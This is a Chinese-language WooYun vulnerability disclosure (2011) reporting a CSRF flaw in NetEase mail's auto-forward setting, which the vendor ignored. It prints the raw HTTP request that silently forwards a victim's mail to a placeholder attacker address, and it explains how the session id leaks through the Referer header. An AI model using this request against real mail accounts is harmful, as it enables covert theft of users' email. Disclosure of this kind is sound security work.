漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02088
漏洞标题:网易邮箱CSRF漏洞
相关厂商:网易
漏洞作者: Joey Yin
提交时间:2011-05-09 16:14
修复时间:2011-05-14 18:00
公开时间:2011-05-14 18:00
漏洞类型:CSRF
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-05-09: 细节已通知厂商并且等待厂商处理中
2011-05-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
犹豫了很久要不要把这个给爆出来,毕竟影响太大了……
详细说明:
网易邮箱有个很强大的功能叫做“自动转发”,然后这个功能没有做CSRF预防。
看看设置转发的http包吧:
GET /autofw/fwto.do?sid=XXXXXXXXXXXXXXXXXXXXXXXXX&forwarddes=hacker@hacker.com&keeplocal=1&callback=MM.autofwd.valCallback HTTP/1.1
Host: config.mail.126.com
Referer: http://g4a32.mail.126.com/a/j/dm3/index.jsp?sid=XXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: *****
看上去貌似要带sid (session id),但是网易的sid是在url里的,换句话说通过http referer就拿到了。接下来可以做的事情就好容易……
漏洞证明:
修复方案:
你懂的。
版权声明:转载请注明来源 Joey Yin@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-05-14 18:00
厂商回复:
漏洞Rank:12 (WooYun评价)
最新状态:
暂无